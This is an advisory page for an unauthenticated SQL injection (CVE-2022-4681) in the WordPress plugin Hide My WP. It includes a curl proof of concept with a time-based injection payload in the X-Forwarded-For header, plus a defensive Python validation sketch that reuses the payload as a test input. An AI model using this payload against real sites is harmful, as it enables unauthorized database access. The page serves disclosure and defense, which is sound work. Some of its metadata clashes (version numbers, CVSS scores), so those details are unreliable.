Vendor: Hide My WP
By: Xenofon Vassilakopoulos
CVSS: 8.1 (CRITICAL)
CWE: 89 (SQL Injection)
Product Name: Hide My WP
Affected Version From: 6.2.2008
Affected Version To: 6.2.2008
Patch Exists: YES
Related CWE: CVE-2022-4681
CPE: a:wpwave:hide_my_wp:6.2.8
Platforms Tested: WordPress
2023

WordPress Plugin Hide My WP < 6.2.9 - Unauthenticated SQL Injection

The WordPress plugin Hide My WP, version 6.2.8 and earlier, does not properly sanitize user input, allowing unauthenticated users to perform SQL injection through an AJAX action. This can lead to unauthorized access to the database.

Mitigation:

Update to version 6.2.9 or later to fix the SQL injection vulnerability. Additionally, input validation and proper sanitization of user inputs can help prevent such attacks.

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi 
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)

## Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.


## Proof of Concept

curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
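
The mitigation section calls for input validation. As an added example (not part of the original advisory and not the plugin's own code, which is PHP), this Python/SQLite sketch accepts the `X-Forwarded-For` value only when it parses as an IP literal and stores it through a bound parameter. The function names, the `visits` table and the sample addresses are assumptions made for illustration.

```python
import ipaddress
import sqlite3

# Constructed sample headers; the second is the value from the proof of concept above.
SAMPLE_HEADERS = [
    "203.0.113.7, 10.0.0.1",
    "127.0.0.1'+(select*from(select(sleep(20)))a)+'",
    " 2001:db8::1 ",
    "",
]

def resolve_client_ip(xff_header, remote_addr):
    """Return (ip, rejected): the address to store and the raw header if refused."""
    if not xff_header:
        return remote_addr, None
    first = xff_header.split(",")[0].strip()
    try:
        # ip_address() accepts only a bare IPv4/IPv6 literal, so quotes,
        # parentheses or SQL keywords raise ValueError.
        return str(ipaddress.ip_address(first)), None
    except ValueError:
        # Fall back to the TCP peer address and surface the header for alerting.
        return remote_addr, xff_header

def record_visit(db, xff_header, remote_addr):
    """Store the validated address through a bound parameter, never concatenation."""
    ip, rejected = resolve_client_ip(xff_header, remote_addr)
    db.execute("INSERT INTO visits (ip, rejected_xff) VALUES (?, ?)", (ip, rejected))
    return ip, rejected

def run_samples(remote_addr="198.51.100.9"):
    """Feed every sample header through record_visit and return the stored rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (ip TEXT NOT NULL, rejected_xff TEXT)")
    for header in SAMPLE_HEADERS:
        record_visit(db, header, remote_addr)
    return db.execute("SELECT ip, rejected_xff FROM visits ORDER BY rowid").fetchall()

if __name__ == "__main__":
    for ip, rejected in run_samples():
        print(ip, "REJECTED XFF:" if rejected else "", rejected or "")
```

A non-empty `rejected_xff` column is also a useful detection signal: a well-behaved proxy never sends a non-IP value in this header.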